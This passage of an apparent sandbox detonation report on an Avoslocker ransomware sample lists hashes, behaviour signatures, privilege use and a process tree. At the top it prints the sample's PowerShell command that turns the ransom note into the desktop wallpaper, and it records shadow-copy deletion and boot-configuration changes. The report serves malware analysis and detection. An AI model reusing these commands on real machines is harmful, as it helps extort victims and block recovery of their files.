powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1604998348.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr

MD5 e27b5291c8fb2dfdeb7f16bb6851df5e
SHA1 40207f83b601cd60905c1f807ac0889c80dfe33f
SHA256 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f
SHA512 2ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a

memory/2772-4-0x000000013FC00000-0x000000013FD1E000-memory.dmp

C:\Users\GET_YOUR_FILES_BACK.txt

MD5 c92c2b70fb37f84aab38412ad9226aa8
SHA1 14f2e9a83285612d0a7b2c83b8f89bccfde6c154
SHA256 d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f
SHA512 04f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848

memory/2500-1836-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

memory/2500-1579-0x000000001B490000-0x000000001B772000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2b7a09a0e2c145e4b62c01f44c903ed5
SHA1 51c8720254ee393d396713a707efc9d894fbfc99
SHA256 990fe5ffb6c40c41fb421312a6cfd200326e0659a50445a9c6dd6dd40893f9b8
SHA512 8b1ac9eb20055848fd3d8bd171664b7346603293ec3c8633a88f0f148c230d0d6b1dfc13cf6e256b4502a4e68173e5f281b0ae844608c9b835c1b8e71e484412

memory/4884-24516-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/4884-24515-0x000000001B390000-0x000000001B672000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1604998348.png

MD5 1102d805d581b2642cec9945747c8968
SHA1 272aa475615770fe25968fc1787353ca08c89953
SHA256 59fde654769fa30863cfb5ae13b21c5adb797f59d810471ea47cf46c2f0dacc0
SHA512 aa3b456f24f541a9408653984d8916ba7e6eb7c18f3e0a054f01836c4ec0bfd3c186e7369a077adef7ee73b5452b3ad87b8a3b338aebe5482171e5fdbf1b54c0

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-28 22:04

Reported

2024-12-28 22:06

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sex.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Avoslocker family

avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (8506) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sex.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1966767074.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\accessibility.properties C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\ui-strings.js C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\editpdf-tool-view.js C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\japanese_over.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\hr\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\OneNote\SendToOneNote.gpd C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-100.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Retail-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_delete_18.svg C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Generic-Light.scale-250.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Windows Media Player\Media Renderer\RenderingControl_DMP.xml C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\OUTLFLTR.DAT C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL095.XML C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\af.pak.DATA C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\version.js C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyCalendarSearch.scale-150.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-30_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailBadge.scale-100.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\bg.pak.DATA C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pl_get.svg C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.format.ps1xml C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\TimelessReport.dotx C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTest-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sql70.xsl C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Retail-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sl-si\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\cstm_brand_preview.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-32.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_KMS_Client-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyView.scale-125.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\Doughboy.scale-250.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-80.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Grace-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\Training.potx C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\powerpoint.x-none.msi.16.x-none.boot.tree.dat C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_PrepidBypass-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipskor.xml C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ar-ae\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ui-strings.js C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OsfInstallerConfig.xml C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache.scale-150.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\Doughboy.scale-300.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\db2v0801.xsl C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\glib.md C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hu-hu\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\main.css C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Dark.scale-300.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_zh_HK.properties C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\mobile_fillsign_logo.svg C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2040 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\sex.exe C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr
PID 2040 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\sex.exe C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr
PID 2040 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\sex.exe C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr
PID 4660 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\SYSTEM32\cmd.exe
PID 4660 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\SYSTEM32\cmd.exe
PID 4660 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\SYSTEM32\cmd.exe
PID 4660 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\SYSTEM32\cmd.exe
PID 4660 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\SYSTEM32\cmd.exe
PID 4660 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\SYSTEM32\cmd.exe
PID 4660 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\SYSTEM32\cmd.exe
PID 4660 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\SYSTEM32\cmd.exe
PID 4660 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\SYSTEM32\cmd.exe
PID 4660 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\SYSTEM32\cmd.exe
PID 1432 wrote to memory of 552 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1432 wrote to memory of 552 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 116 wrote to memory of 3380 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 116 wrote to memory of 3380 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1404 wrote to memory of 4948 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1404 wrote to memory of 4948 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1880 wrote to memory of 1124 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1880 wrote to memory of 1124 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4160 wrote to memory of 4748 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4160 wrote to memory of 4748 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4660 wrote to memory of 20636 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4660 wrote to memory of 20636 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 20636 wrote to memory of 20128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 20636 wrote to memory of 20128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 20636 wrote to memory of 19672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 20636 wrote to memory of 19672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
